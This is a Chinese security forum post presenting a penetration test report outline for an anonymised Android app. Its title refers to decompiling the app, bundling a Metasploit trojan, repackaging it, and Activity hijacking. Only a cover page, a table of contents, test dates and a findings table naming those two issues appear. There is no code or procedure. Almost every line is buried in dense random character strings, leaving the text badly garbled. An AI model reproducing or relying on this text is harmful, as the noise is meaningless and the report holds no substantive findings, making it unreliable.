找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 4599|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
. n% ^9 p5 k0 p8 |- K" H0 ^ ( h- Z& P0 s! @

! _* ?0 N. o, g5 @; h- q * m( S; x W5 k9 ?% t
, m" V ^$ A2 {/ G # ?% [6 N# d1 P7 b/ q8 \

2 E. d7 f9 h" Z$ V! p , j A, _; C& Y7 t! E4 n9 R1 \- w
: t- R0 b: t# P7 B4 ?: {$ `2 b , ~1 T \# X. |

' J' q" i* X$ ^* e2 F1 w * r$ c9 S" x, g& v2 i 文档编号:                2 c% Q% F+ k T' A) H. R2 g 1 C) p4 I# [7 v

# {+ A! a: Z( v& h4 @% G3 S- X, p7 b. u4 c; k% G! X3 F

& }# k3 w: _9 g t5 P7 H1 H7 w3 }0 K6 }2 z! s   ( d+ ]4 Z4 a( B1 h- R$ E s9 k! m, x: c' x" t! m

; K* e# c1 g) i% N, @4 N2 {7 H# a. @( {( R/ Q2 V

4 T/ F% X8 b& h0 V % z' |4 N' l% S y0 z3 ?1 L* r   * F- l3 z# f: J1 O ' K: h: r7 T% o6 p$ y

2 \5 t5 Q1 s! q2 s+ I 8 L7 q) t3 Q W) b' L

' F+ x% g, x1 H6 M s& R) j/ g$ c, \! ^! l' s; O" f( a   ; G: y8 J( E$ |" g* l, m2 W' _1 e" A9 t9 C. d% \

& h, B2 V$ x3 p$ ~ / t$ ]0 \" D2 H4 A7 U* B* f n. ~$ W

4 D+ o! i) m' u$ r7 a1 J. P5 X6 P1 z6 }( }9 r9 A2 j   ( F/ h" c) r2 l 8 I1 a4 E) B+ h6 F8 q( ]+ a; `

1 p7 k9 u: a& ^ Z6 d 7 p$ d6 n7 D, \

( h& b# b( m- k5 F. A4 M 3 f/ q/ l. X: {) Z$ r1 r   % F* f# s. @# W" @: l, m) ?: O+ V* \7 d: ^) u4 v

0 |& T) }% U& C* r o6 H7 J2 q/ t4 m+ Q! |2 P+ L1 s) S

+ a3 M ^$ T4 x4 C& t % Q5 h5 a1 V2 z$ x8 T$ ~0 H5 E/ D+ ^ 某某某APP渗透测试 9 ? y0 i4 Q# Y( |5 P 4 [& @6 z0 u, b) O7 j$ U

3 Y( \, [6 I$ Z! x/ r) A& x. K$ l. Y# C0 s

! p/ R$ _; K( e3 a# @ k 5 ~' U7 B, [! a' R' P% @2 j x   : x1 }' g4 h8 J+ f$ F0 u6 I " W9 n* x" v8 v* T6 A' b

P- n0 j+ ^2 f7 R) h 3 s$ D. T+ [) y) p* u% ?" p

( d6 G& D% P. }4 g8 O; K . W2 v7 S \2 v3 [+ v   2 B+ c( a% j6 X7 q C2 x0 ]( H. E. F, N" n2 s( M! m1 A( d3 j

f f1 o3 V9 q6 p 8 {& p H0 _5 o2 s4 ]( l

7 c: I8 S, ]' ?4 l4 }9 m 7 }" }3 c f5 h8 Y6 f |+ W   : T N; n" [+ j : K+ B; A4 X9 ~/ s) r8 w

9 X+ J" _- i( I) y 6 o' x% @2 t/ @) Z% B9 a

/ l! p3 W6 [: U, s / X7 W, L6 L- D$ J9 |7 Z! K: A   + u; U! ~# k2 @. }& P5 W , w/ p I. t# p$ t6 \: v1 \

3 r# L; z* O- s& R0 E6 k# d/ j$ Y) x, W

8 i6 Y) n0 \1 o! _ " l0 U- f2 v2 e. b 技 术 报 告 6 c8 G* x0 h2 n4 T$ ?- g# V( O( |# U8 [8 z }* V

- l6 R) |$ n9 V5 B. }4 i4 o6 D. Z) T7 f# H0 q! i4 v

- ^* j' z+ M+ C" i9 I& S/ r# s * I8 |9 d0 M! |" U# j# p: h$ I" g   - l: a- U* q s' F * J I7 w1 }6 r! Z- s f7 F

! c3 H) G5 r9 x- d. L # b: V" q; X+ v5 g: _# l

6 B6 ~- U: F4 ?! u+ x! F $ |+ c& |( w$ | l   5 Q$ J. `2 |4 I1 `' K# o' Q1 T4 W' S

" W' Y0 T- R0 d# h9 V% c- \' N 8 I( j! ~2 V) W2 m, L: r: |

2 K1 Z6 K% b$ g; i 5 F" \% {: ^/ b: Z; l9 ^   6 \7 W* Y+ m1 e% @5 u& g2 a # @. x# F& {2 ~6 n! @

: Y/ F2 a' w0 @) i; |6 m & {( @( F6 V$ m5 j' [$ ^1 b [

; v7 b$ z* C6 b$ v c5 @1 ~$ [% {5 O& A8 k9 |) s   1 ]8 ^% \2 W: a* Y( y; S5 u 2 M0 I5 V i7 j$ W& v

H+ O1 F. k$ t- H) o( B 3 @$ x" t5 w$ H4 B3 I

4 c0 a0 {; o) I! i; y 0 n" q% i2 W7 o2 ]8 H' I   0 U# W: D0 F9 e8 h# d5 t( J1 l ! u) h" h) Z4 O7 t8 ?8 j, \$ V1 z

. l1 g& h! b W, L 6 G8 Q' e2 ?/ r4 `5 T* ]# G2 S

" J2 o8 a7 Z6 c& ^ . N2 C! u5 t0 W4 Q5 ^* |- h. x% B   + o- O/ ~$ ]6 m" X9 L6 e / c0 b$ s t9 }0 T$ a, A) q

# J# a9 r: L& ?5 C ) F1 _$ p& i8 h8 A

4 p, b. E+ r6 p: l3 E7 Z5 v / `1 t5 N h7 @7 b p$ ]   6 h' H; E' x6 a+ r" R ) f i2 U. B& t

3 w7 v8 G6 Z+ V0 q . c( M L4 r& I( J

. G( u) m6 A$ S9 V' c) A9 g% Q% n, R% a. c ?, I3 F! o7 ~   ; C+ u" [& J" U) p / ~$ N% u+ ]6 _" ^+ P3 g7 E$ E' E* P; @

: m) `' R8 w8 e' Z3 E* L+ a) a; |. F! S8 v6 m$ S8 D' x

3 k M' I9 B& m% T1 h 3 k4 b8 G! s4 k' K9 r7 [* G   8 {8 z) u, P3 u7 d% e. D8 e- @ ( K- V) Y9 k g9 k {1 I

4 [' d; {! p: J: H( r d7 Y% D2 k' Y$ e: C& k& X

, K/ V3 n2 B+ m. J, W0 o " P2 a9 {, x5 w8 w/ N- l9 x8 U   " U3 W9 P7 P/ b# S. b! H- e) A& f 7 f+ _) G' H/ l! p

8 W' r( Q: |7 ~! U0 g; r$ ` 8 B- ^5 N- A. |$ H2 V

5 X: b: M/ ^* N* O 8 C0 z/ O( u6 U2 o   7 \. H3 K6 q! f* W4 h / n- S6 o+ |' a4 k

: k. a+ }' \+ I# }# ^ , X" T0 O$ d: Y1 S1 [, B

. {$ P, l/ T/ _8 K6 W$ K2 `0 z3 |; ^4 |   5 q- r+ d" Q7 j( N6 c6 l2 l 9 D O* y. K5 v8 Z4 O4 r+ K3 h) L6 Y

5 {. N, G4 L' {, P4 f; O# O5 K0 G9 K: L

. x5 k8 k) G0 g+ F% |8 b; j* {* m( V   0 ]4 U D; e) E/ ]% S& A1 j1 Y$ x, }7 `6 i! H; Z

. ~- `5 @) K0 {4 Q1 ] " x& Q2 E) ?% a3 R' U k: Y

h$ z" n7 u$ z J7 s" K 4 c: Q1 {& |9 d   ) l% c; X% v9 g7 z7 ` ' w- X8 j! r) B, F

+ v/ G. A" e1 t4 Q% C + n* g7 t g D$ y9 p

) _2 x N; S+ a" g + d- h8 y( c5 T, @5 S' ^$ x, }9 ~   - t& [0 z+ ?' A5 A; C2 b. j- p 7 H2 K' r$ o1 Z* S I7 Z3 j

! @/ {/ X/ ^% h x7 N( P" m ( m9 t! m0 F) S* {8 M) m9 G/ h

d: h* [. G& f) C& b5 y% [ H" i# f   0 a2 U, m. t2 ~ m# J' p% l. j0 Z/ `5 e$ ~% {* o

+ U' @0 m4 m: C0 X: A ) _2 I- @3 ?: o i/ ?: P

/ {. m3 K5 @* v* ^3 y1 [( c% a ! E4 s) f" S/ [4 f   ! J6 c, M1 b' h" ?( f0 s , Q" A+ l7 J* s V

# G, t/ C8 {$ q+ Q. f2 t ) l4 C' x0 s4 F# i

, O$ S5 I7 l) G+ V \ 0 a& }, P8 c6 K4 _   . X5 T" y% r; N 2 l$ o+ ~# I/ c- X

- V. a3 P, m# M6 C' z; j' t2 v$ Z. q0 X" C( M# W5 v

5 T. @- z6 u& R; b6 t5 ? 5 X! A4 q, C+ b/ B' N 二〇二〇年 4 d3 z5 H& p1 I/ l6 \ , K& t' g# f5 ?- |5 i; ^+ T5 R" B6 n5 Q

7 Z( [$ A. n8 ^# E% q6 `# V- V3 x/ t g# W, U. }. Y) F8 f
/ K$ N' B& n& }' [2 D8 v' O0 J + s+ W5 V5 @# E$ P
3 {: i* g8 K4 H $ A- n" m$ V g/ a! z$ G
! D6 e) `, b6 h& ~% i 0 e- ?3 j" W) | w p# F
: J: [$ b; ` L2 u( | T- X+ c9 Q% ?! e
* b; q; a: u! b! B8 N+ w) G % [9 s: [3 ~0 F8 Q
6 ^7 Q) W0 }5 b1 @) f. R 2 a4 N2 w% _6 ^' k: M/ h* c
* p# c0 M6 I A 3 j: |! y$ [1 a Y) j
# y$ h g. W7 S! ]7 \7 y + X$ N6 \& r& p& m8 R+ w

! N4 _3 a' T9 Q6 n) `2 f' z4 E * M( p7 N$ f$ i0 G, u$ S& s0 W. _/ Q 目 录 6 y) I! \4 `8 ? . [2 w/ ^3 b& _' m

( F0 _" Y; v# ?6 b! B4 M: u n " ?, e# D/ ?6 i) S 0 t( u* E9 J T2 @/ v* w9 Y1 w 0 L) x% v) h8 r, ^0 l

4 T, F! c, `- e 6 Q1 e3 ^, H4 {) s; v4 P   : T k) g, S# { 3 E! ^( g+ @$ a3 W0 {' |, C& r$ x d

) W$ p& J4 h+ A" }* i( z8 a Q) ]$ _: q3 T

4 \+ J5 ]! J! p; b/ p6 l 6 Z& S! Y4 b; b: f8 { 1 概述... 3 v% v! R: @$ M4 Y$ [ $ b0 P1 a! P9 k, G1 G4 _8 H$ j

) N' ^1 e) r* g. W U7 p9 S 0 {( j& w; X# c( I% g

2 J& V. r1 M6 S s. S6 h0 {" r" T 1.2测试时间... 3 $ j( U: T( r: K# i. [ ! s1 Q5 _4 I3 O% M6 N% J

* C+ [/ I9 |. j6 N' u+ S ' `' b" e& Y& d8 B! Y7 X

& h, B$ `3 M0 B5 w* t; |: f + W3 ]. k9 k9 ? T; x5 u3 y1 n3 J 1.3测试对象... 3 + c) \- E* m5 L" F7 B* m" G: F' A + A+ X. `: t; ~, Z; C0 [

6 V2 X* _+ l% s: b: U8 m) c# s + A; @2 w: \" Z; r1 T. Q

8 T( F% N j" e8 q! @8 v5 E, e9 W ( i+ Q, o5 n- ^ w2 Q. q. ^* a 1.4测试结果... 3 5 @! s; N4 _+ R: j7 [3 R6 g # N7 R0 B; P' N2 ~9 P

; e, {0 R: d( ? 9 u5 I/ s- N4 u( L; B. L8 `

# v5 F: l: H% p6 A # R, n; U7 D% l- h0 R 2 检测结果... 4 " t: a, k+ N; ~ & J9 z" W2 h N, T' W% _2 p

, W) w$ B+ h/ n; {8 a2 ~$ ?; B 6 d$ b/ N0 x( Q. ~, h; l3 M$ _

! P- A% V1 r$ Q( i- K4 }1 a & ?$ s L) {5 }0 B 2.1 某某某... 4 - i+ e0 }8 J7 x& J" s3 G, E: ` / ]1 [, M5 x+ x( f4 K) j

1 h& @$ W0 |9 q7 K' f6 F5 z , Z9 {0 W8 D& A4 ?, \

4 g! R* K( q; g/ D& p . O; u, f# f5 ^) H3 Q5 Y 2.1.1检测目标... 4 d+ i% k; P# y8 a' w2 T ' f; k e. {( Q3 }; Q

/ E& q0 R/ K9 A 7 y" L' b) ? u+ Z: `2 G

' c. Y: s# C1 f: j+ e9 o7 T/ x ) R/ f" U# Y% C. X6 f1 f 2.1.2检测结果... 4 . y) f1 H/ i& [ : g5 M. r# A# H$ P* [

+ Q5 E+ m9 g1 K- [% e; X3 M0 w) I & t2 y8 C& b1 n0 H# \

( z) G5 ~ r/ M4 Q- c/ F# n 3 m& {3 z" Z0 S) M( R4 s) z2 |7 R 2.1.2.1. 4 . i4 L; a& @6 L- I9 b6 w" F+ o* \0 f. q9 n& A: F, R* V# u+ r

! y @; m' }$ K; c" v 9 i8 D7 M$ i( Q! ]' i @

* o( B4 I$ N% ]% U$ a* B, u6 f1 @% Z' I) q$ K* E' t4 h 2.1.2.2. 6 9 o9 X2 _$ _4 T( M: i `+ \7 A5 R% n- }7 n& X8 m. [

, i0 D( y+ m0 R1 m- u6 k - N- w1 {4 q4 o& x: q

& z. U+ B q! U3 m& U 5 |' \7 D& @) r. W9 b 7 Q7 s% c: ^& v' L/ g( \$ I x( x

@7 Z9 w+ q3 b/ X- q 1 ?+ m, N. Z3 A* |
7 Y6 _ A, Z9 _8 ] + l1 j4 Z" \, C; m# S
% S9 ]$ h) b4 _/ q1 m. P + l2 Q. |1 T/ }! [
, X3 O! ~9 {, T$ t- R6 ?, W* l% w " a, E# h, j/ X4 X3 A S6 C
. h) P* w1 q; N4 P! U, a/ F" @ ) m- G4 z* ?, A: p

' y" g& {6 c, W* l 2 k3 N& R% R9 o) l, |: r 1 概述 0 Y$ W5 P- ^* |8 s( F$ q& ?- r5 H/ O5 E - l5 c. {: ?) v

" D: p) z i$ j$ R( b 6 e& e/ Y5 Y7 l; |

' a' ?3 X: w" l; P, g' Z - \# W2 f1 G# g9 H1 ^5 D, K 1.2测试时间 + P. E) W$ h( [ d! p( w* i: z( `/ {/ N7 l! ~$ W. U! e/ I

7 j" C" O/ V4 @0 n3 P . H, S# G- b( G$ } . V5 Y3 F0 c# x. \; `! W0 r# \5 B; o/ P* y' u# I }2 I+ {$ q& X8 Y4 w8 p( z, I* r1 X" j5 J$ J7 J' y6 \; a/ Y- K7 U) s" L" F8 ?1 ^7 y3 X9 I1 X( p2 z h( T% }" \! X9 |$ C1 j! `. r% M4 r7 ]! N* O# z# |5 o; c* M/ R( h% d5 w U" c, W4 R% H/ m, \6 ]. O5 {4 d! W& J4 r' h8 B g, H) n% J( {0 u, r0 T' a; Q; T/ F* c7 i9 L- \2 `# I! U6 a- j/ E9 O/ P. H# Z- D2 [5 l+ A. N- U* U0 c" {3 e @* l6 Q& ~$ ?" b8 E- B8 \/ n+ G; ^6 z" U5 q( T, i' _2 w, V' N3 {; x. [3 K+ u9 y6 Q6 p& S4 R' ^$ S6 {0 M, ]6 V0 b( p& X8 `' X# m! X# v: M8 X" l2 D7 }! U; L t- [7 f4 @9 A9 a( P5 _# D# a# _2 g* X- g: Q6 Z+ y0 \1 Y% y2 g! i9 |9 [% ^ J" C; T: A; |0 I$ q7 K" [' l# f' [- h' c; Z
) [) A) M) c2 _4 K7 \; ?( L8 l. H9 F

3 W: q2 ^2 a4 D l6 Q- K7 E \# ]) h& }! x B 渗透测试时间 2 X, M+ w1 l: z1 T, }3 m$ j! Y 7 Q2 j7 B8 o' G. @, {/ z: L5 V

6 ?) m( k8 P' D . j+ e. Q5 D6 w% x/ e: [+ m
% c* m& m: ` C$ ?) x6 ?$ U& y# {( J

3 G7 b, T6 \- f( d 7 l* y N1 w0 O8 J. F 起始时间 2 f: r* ^6 m1 ?8 L7 Z- r+ j! Q 2 I* @7 Q7 x# R+ I5 ?6 B1 V2 I1 V

; z. D* o- z$ S( o 8 E% e) @' J% b! F
9 b" I$ G5 E$ }9 C3 z( y: }% M/ N6 {7 x4 h

# i9 I* ~* L. P5 u2 f! s 6 f/ n; Q) F8 u5 A2 z1 J1 C 202046 8 T0 L) x& h* h4 g + H4 m$ w, L) A" a4 @& h

) q5 _. F% _4 b . Q w$ Q# N: y+ L( J
! N3 h) G: h% e, b" g0 c- i 4 ]" |( q! m7 Y& w: L- b1 t

8 |5 U5 g* ~! D5 `& a' s - D+ u5 f9 C( E 结束时间 6 g7 L6 @; X2 L& [$ b- J) q" ]! H , R1 u* E7 H0 _7 \

H3 c C- P- K5 y * v: v4 e0 M* s) y: J4 {
& B5 j2 q# P9 d7 V; i; k . \- h W+ x& R" r

' {3 ?9 K9 J" I$ J: c( M' p: p9 c7 Y* F' I, u 202049 - R7 a; J4 e+ c A- k 6 Y0 o( t( l z* ^. T$ R8 d. J

2 h/ r+ R0 @# v+ \. h# d, Z v$ V2 e : `/ c! @3 k6 S- e5 H
* o3 m. I: E( J4 T( a; W9 h1 E& _6 p5 Y3 w) E

$ v: u+ m1 G, Z* S' v( h8 {9 o7 t: ~$ j; x6 d# v6 P$ M) S5 ^ 1.3测试对象 # w5 x/ V) {7 r - u% f9 w# K( F7 w/ v& H4 Y

6 c+ Z' u5 t$ k a , z4 J+ J* f N- p/ |

7 |8 h6 M& o( S; g: y0 M 6 f5 C5 w" c7 |1 y1 ` 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: 4 l4 z1 R! w3 d 7 }$ G6 F! i: p- c' g

% l$ I0 o" F( O- J+ e 0 f" p! a' v8 E+ R

2 H5 R) `! `: ^ 8 q) `1 b. x0 b0 [1 o! H4 ~ 1-1 检测对象 0 B& r) Q% j' L* d' Z- A- G& v3 X1 ~$ O2 F4 F3 T/ l9 M

. X; d1 E% p1 v! s& x- K$ _* x% e9 [. C+ S - h1 C! m- t8 N* d* {# E) F6 M: [/ H' X: y* _. q0 r& C5 E2 h! c" k! M, @( T; V% G3 j* p. D6 o4 r3 w. r+ a9 G; \' r0 F( s6 J. ~" i. K; y, T! N2 n' f6 ~& Z, K' B" _0 ?- {& `: ?* Y" R" V5 S3 z/ L; H. ~1 X' m: m% b8 ?8 p5 n" _9 E% K$ j( T; R1 \, j3 n- C' j& G d0 Z' c0 z' G4 ?; R/ X% |$ A2 S" V; e. @0 P: ~ V# V: `1 f: ]/ w8 h2 q* n; A' }& p9 J% e0 ~7 U" D% D6 l, X' ?, \4 `# k0 T1 K8 ~! `& J& T+ o0 V1 K0 c1 Z+ _: z! F: u8 ~- {. @' f v; h" b Y1 z! o& o4 n$ L4 u) g$ \, b. o* c! G. q) e8 B1 P7 ^- Z9 n* Y# W, R; M! }. r9 J) l8 o: r( B& t3 M1 Q- P- Z& k$ b% S2 ]' o- d+ b. I; r* W# g6 u3 s( {" a( R! Q# Z9 Y( \8 f d" O! X' ` W1 z3 i' z( A
0 d6 H4 F& Z. r1 ^* C/ G , F* m r: M& ?8 _5 w: g9 [

/ G. A6 A% B4 {" n O ' Y# ~( ^: j# Z! g* u4 o 序号 1 b( o+ M% g$ \" \: F. B5 N % ^, ^/ q/ H& N

* j/ o2 K" G: L1 S7 [ , @1 C# n2 \" s% ~+ S7 l
6 t) A( O- W, U. q+ c; P, L7 ? 9 J$ Y v2 y1 {1 L+ D$ b \

( a* Y7 r) G7 E : s( r( E h% j' H 测试对象 4 H! d+ ~; p. U8 ~6 i# i6 i1 J9 h5 U

. G9 @) g2 j8 i& T( H7 U+ x 2 n8 k" F0 R2 E
8 w) s! L) \, t3 p. a) h # ]3 L2 n$ n5 X! g% C+ J

. A* C+ H4 s) ]1 s 0 h, c/ F6 S. S3 M 测试地址 6 M) Z$ P; ^5 ^% {# b ! N5 v$ v5 k% z, K9 O' {9 w- J% E

& K+ a3 q9 e. h9 e7 l. b/ ?# T. x0 y' x% Y( ?8 x, G
1 e1 F! }0 p1 q% O 0 S6 \6 B- N) d' U3 B1 Z

, B) }' z& U+ k! m+ c# U- T, j3 y: r: q) B, d% v 安全漏洞 : I7 t( P4 d/ u $ x. Q2 `7 K5 ^; T: a* q4 l6 ?3 D. C( A

; G+ v& F2 V7 Z: I7 m. F - W& b) m1 }8 L% a0 K) R N0 P
+ d7 d8 Y& f# T" X% @ , S( I X% Q" F; P% ^; w

8 z4 [$ q; H- W! j, @ 3 v, b9 K1 }: x& q3 K7 R2 Y: N9 M 1 ( Q5 X0 J X1 g, d* Y1 ~: z& P% i, n) Q" R- z$ Q+ }. z

3 t# P X: \& R9 ?5 k ; p9 T& ~; |4 f9 K8 j, X$ G
" C$ g# i8 e& R) }, U ) d3 Z, A# D: m# E# N$ p

/ r! t9 g$ t1 X. }6 F4 x # n) i/ ^% J% u/ V8 Z 某某某安卓APP ) H$ d' f$ C# T) `# O( \$ T $ n' R# U' B. c# e6 y& G1 M& |

1 X; U( h4 K2 y4 U. \! }: @/ g1 @8 r
, W- j2 ~( K' K7 q : B0 v) b3 E4 a( N

7 V5 x4 W3 B9 ^" U 8 k8 X! ^9 r# e( h   3 O$ @7 |4 g T % d# G) S* t+ m A: q+ q, o7 p, s5 ?

- Y) }- U( F( C$ h& M5 w : K. ^$ e" e" \3 q& j$ a) C/ p4 U3 G
: I l$ I! U( X1 b% n+ O, l & i, ~2 f5 i! N/ {

6 @6 s6 E6 l+ d6 n% b: o, r1 r5 l0 A! U+ l) U( c 2 ; M$ n4 x7 c( t" p; l6 X ( O) B4 e/ L: g5 T

1 X' q3 R c+ o& n* @ A8 w % P4 F0 `: T6 {, i
* P# Y/ L) d' o% @ 0 n/ G- i/ Z+ u N. g9 k

9 Q" d. g) b8 q0 G4 B! u5 t. @8 q8 ?8 P! I 1.4测试结果 # m) _( F% V6 q4 @4 _7 n 0 W6 A3 P% Z' a, D$ y2 U% T

* O& k) i' Q- f. C6 Y9 ^" x, [- m' y G! y o f

5 [( `: j6 y- i/ M 8 N; n* h) A: q1 Q 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: 4 k: C' l( O8 J _: F% `5 a9 f% l7 ?) d 9 J& ~' B" M; Z, A

! H1 I! w4 u. k% n1 Q # F7 K, c! K7 M/ E% J5 g: i& t

1 ]! W& @7 ?- \- I: `# { 4 Y& F K+ L/ e6 n3 z) }   ; F) ?5 o2 s! ?8 {; ~+ f4 F2 G 1 a9 v6 x. O8 H9 M9 A+ y- p

4 g7 W2 V2 E) G' S2 V( m; ~, ~0 H
1 ]7 S# y4 K" X' ]! w9 _ 9 a( }" D: T: G7 }( {$ h# S 4 L( n0 D5 Q* U% w- Q6 p, ]! X2 i* p" M6 A! P0 }) c- F% a- H5 f7 S- A7 G G$ }3 x+ Y( W l# H5 G1 O! Y: e! x* Q2 @0 t8 V) c/ V$ n0 t# a" @1 V3 R# @- _: a$ g. M+ o# q! C1 D+ F4 E& Z- J* m$ o8 u" X& P- G" ?$ D& r$ V8 G/ c5 w9 k U. _% v) U( v: Z- }: x0 q- C, D8 N9 \" j6 \) ~3 k+ J5 Q1 f, P6 T5 h+ S. N. n/ ~% E- j/ v/ S4 t0 Y: L, ?! B6 w z1 f. [6 i3 A; X& _( [' T7 U3 M6 i) j# B; H/ G: x3 _6 t! v. W r2 _2 ?2 M" {" A/ ^+ |. O; \! l8 `$ J) Q* r+ e( M# Q# d3 W \. [0 Y+ P( ]4 x5 }) ~: H& r B) t, Q8 R! C$ m# Z: G4 C! r2 u6 n0 C; {( ]% U4 I# N4 U$ e* R6 b+ q9 M2 w5 r0 Q! k. ?) T( H: x9 ?1 p4 z( c: Z0 \/ Z* q/ U- U9 J; p* R% i, T4 U# ]3 {1 o2 [. x# J) p( k2 b( ]* s5 A6 n' n T6 F1 ` b; X" f9 L" J. i3 h7 f' A! j& t" @+ X- S$ I, r0 g5 O0 h/ }# K* O3 }( Z0 ^6 m7 F/ @! p7 S% ^1 a; u& _. t$ b9 U, I4 W0 J% {! H. b0 E6 A- N& j- L8 T p V& p# {' d/ R. O/ q1 b1 T0 G4 |) j8 N. O7 }9 l8 i! |9 c% {9 T0 c$ H0 m- O" q' j# |( G0 v& D/ u1 v9 b1 N# Y- Q s+ L! g) m2 B9 V$ ?, ^* C2 O) k5 I( X& s% s1 L6 n! H; \* F4 K5 f( D1 i* Q) I) r" J8 ~6 n8 H; |+ z9 [1 I4 g/ |/ a4 P
* J1 _4 v7 g8 M J- B 4 x- i, Z! t5 ~: c

& T! U; _ R/ V& H# @ p A3 O7 _; ^ 序号 5 A! }: z C5 W0 d! g) y 8 C) Q. C- `2 y, z% Q

- @5 w7 C5 e) x% ]2 o! J6 m4 c& _ . b1 k2 h5 H+ L. t
" _) O1 F5 S/ E" j ' ]( Z4 P8 U" f* d+ h( g

& @ b u: ~* K( Z. c 7 y; l u) ~: T! Y# p( }- C0 P. y3 R 系统名称 " C+ R+ O; K3 Z$ |/ C/ Y $ j! d3 ~# \7 y* ?6 L

3 Y+ G6 a5 Q5 Z8 C* R2 P- w % M4 [, M% o a3 [4 g3 u' b7 y7 h
6 V- `2 C- Z3 O$ `. \$ m @ 5 u" w( s* v& P

; C. I: @1 U) ^8 G$ _. P: u 9 a0 C3 t- M9 m7 w: g% t* r# G 漏洞名称 ! L' b* q/ p3 N H$ g; t # ^5 g& _7 I9 h- y

8 i5 P% Y9 N4 \7 b. m' T+ m% b # y- k: e$ P5 U7 z& _! k' }
: g8 Y D- g4 V! ^ 2 C/ i' `8 F( N0 f: p

) g8 G* j8 D4 T Q0 b ' K$ \/ B2 B3 S4 m 漏洞危害 2 ?6 F5 U5 H) p8 |$ Z8 u1 Q. G% r; }/ S3 L

l' _* ?/ L. @ " z j" v! E" I9 g+ z
0 R4 g0 S4 y" Q3 Y* i& E* P e' J8 [1 O& M8 t# Y

* L3 h0 O2 p! t- C% K9 z ( r' \6 A u1 k/ |+ q$ O 修复结果 6 B$ j' P6 ?% q# d" L6 a1 d9 c9 Y# n - h* H# M8 X1 o

$ q# j( H2 z f/ ^! x8 N+ [ 0 B/ ]/ [, {) P" M( L. r
/ M* w- R/ c& O/ z6 W9 M3 o " y3 C8 ?# C- N7 z/ c

& Q6 B" t' s X# H5 R ' e w5 K1 N/ W" o. M, h: A9 j4 v 1 & f I/ M+ @6 ~( L$ g8 e- e & x- F( V1 O9 ~7 n: V8 |

' c! s% ` j' G6 J V 1 z4 T: a! A; K7 o$ c* T4 D
( ^5 S6 b* [. \: o2 P 3 J \4 N* b# u

& ^4 W& _" K ^) I0 B , v& G4 ^$ u/ K) H$ K+ [ 某某某某某某APP 1 d0 U9 A ?7 P. l$ f * o4 t& |+ S6 `0 X

+ T- T* V- L$ o- G Z8 H 8 |* g) F q0 N8 S* T
+ B9 j. S( [7 w9 {* \7 l9 [ n 8 D& W3 K, T9 t

7 Y& L+ A& o9 K7 j. ]( I * A6 D! ^6 C; p Activity 劫持 5 f+ b" \1 z# _9 ?. b, E0 f & i' T1 v' |+ K) B- P4 C

/ c3 V8 i1 s4 v 2 }" F2 z" C; W/ V7 F7 q

: E o2 [) q/ s' B3 M 7 E) f# ^8 t B/ Z5 V, S   7 Z. b6 m, H2 r" `2 }& ~- t1 ?* f- Y: \( L/ P3 t: V

P4 h9 [3 I! V8 o 1 v: f# `" v% |9 W
1 d( U/ r8 q( l1 ^" @ 6 j v* U% y$ k7 p$ j$ h) J C

, j' v8 C$ }9 { 1 A" b$ }! S; J B& I 1 c+ O$ f- N5 v5 x; b- H, h' ? # I1 F( r. A. Q2 U G

1 ], c% w ?$ P5 j: g 0 I" z- J- N6 _
! j, z; p0 ^6 ]: Q1 W2 { ) J+ C: q- {* K6 P1 k( H3 ]0 |- j

0 z- l% k" i& D$ Y7 h5 [ 5 d$ y' t- b7 ^+ A4 S% x, {   % G- C: Q1 J$ J0 R; F% [: i2 d ! c5 X3 H7 c+ g1 m8 a

+ D' g# E1 Q" o1 k% b1 x* B- A; X7 J+ G" |
\$ b9 v+ d- D$ o # K3 ?* T/ ]8 q) `) Y0 C" o1 ?5 K

/ Q' P' p! C' B! W9 L/ y% ] ; D$ T1 B7 v7 n6 Y 2 - ]& c* k3 e) L$ R5 b& g " D( x3 _2 m4 ]6 {* A! D' @& E

, {, N1 j4 f) u: |* ~9 A+ b $ F6 Y& y. p0 c2 E* C" h
l& u5 P2 F( v- W/ h ~1 X) [) p- Y8 B$ L) e0 Q9 b

% u+ E1 p R8 r. x * I- d& S+ b1 C; A 某某某某某某APP 9 v+ V/ b% P2 \/ b5 Z. s$ {) F* p4 T0 j" s

) s& Z0 m$ z. g5 Y( L/ t% z' z# t7 `+ x* @. v; i0 P7 P, ^" H% t
% H: p! P l$ x: w, p7 d# u: u1 o0 n) v4 V/ d& B

7 S1 d' u/ o2 j1 `7 T : P5 [3 z2 P+ U1 L4 V! b* g 反编译二次打包捆绑木马、篡改APP代码 " S: K8 h1 k4 P$ Z' ^ " H5 z3 e% j5 [9 u! Y1 A

$ R8 {" l8 p7 n 5 A/ p' f% e* x0 ~% R( G
3 b1 c$ Q$ D5 w! `# f 7 ^6 t2 P* u, K* N

: N% j6 N* O9 R 0 P' g' ^9 L$ I# N: j ; p& q% ]8 N8 b) T3 i 1 d# w$ h+ x: t' x! i

5 L- d! _: N, I K: p( V; {& p; a! U1 r0 ~
/ C! |+ G" t8 B$ [- o5 |2 p ]' M 4 {- S% p# j* s+ Q" A

. H C6 k$ `3 E/ c% i7 v % X F' z- t9 ?' r8 r   % V. K& `9 s4 M$ l, e: z! F7 ]" ?: O2 f 6 z$ S2 C8 x2 i0 ]

k' d( Q. p1 _. P. a& G& _ 3 k* y/ g! l; y5 ?; Q
5 c- @! g, r) q( I/ T ! G( V/ d3 `% J% d
3 J5 h8 T, I. j3 E1 l/ n6 y' k+ t0 ?5 Q3 o4 K6 i

8 o b+ l7 _1 K+ G! W + L# l2 i+ Z7 m4 U/ O8 L% D   * s0 A) Y" ?# L8 i+ w 8 T$ P a# G: s$ d5 |

# r3 h+ ~& p' t5 W; g- a - Q- Q, N" c/ q' P

" }+ M" x4 a4 W$ c 4 T- D7 q6 k h/ }% h/ }, g 1-2 测试结果 * o$ b9 b/ z# A2 `0 X4 Q" i' i4 u, z1 s# K / J) v7 c; q& z, J! D

# X9 l7 H8 S% C l% @9 t) L$ `2 @ , `& i! D. D6 B+ c3 F* {

x$ U. P. o- u/ K. o 3 i. |& W% g W- W# D   ' v5 F# Q$ q4 S" W* G8 ~ 0 j) [% ^# ~* A$ I* V

5 Z! k( `1 J' d0 J; t- D 7 {; C! W* {9 a" a) \, F

